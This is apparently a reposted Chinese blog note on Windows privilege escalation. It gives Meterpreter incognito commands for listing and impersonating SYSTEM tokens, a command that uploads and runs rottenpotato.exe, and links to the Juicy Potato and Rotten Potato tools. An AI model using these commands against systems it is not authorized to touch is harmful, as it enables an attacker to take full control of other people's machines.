烂土豆、msf提权

标签：注入   ota   graph   rap   imp   进程   bre   相关   lis   

提权 令牌窃取：窃取system用户的权限，注入system权限的进程

#msf自带模块窃取

#烂土豆及升级版

#相关操作命令

use incognito  //枚举有哪些用户的进程，一般有用户和system用户

list_tokens -u

execute -cH -f ./rottenpotato.exe  //上传rottenpotato.exe并执行提权

msf 一条命令窃取system用户：（有时候不顶用）

impersonate_token “NT AUTHORITY\\SYSTEM”

cs也有提权的插件

https://github.com/ohpe/juicy-potato   //2019出的，这个提权工具比较新，好用

https://github.com/foxglovesec/RottenPotato

https://github.com/breenmachine/RottenPotatoNG

烂土豆、msf提权

标签：注入   ota   graph   rap   imp   进程   bre   相关   lis   

原文地址：https://www.cnblogs.com/trevain/p/13698918.html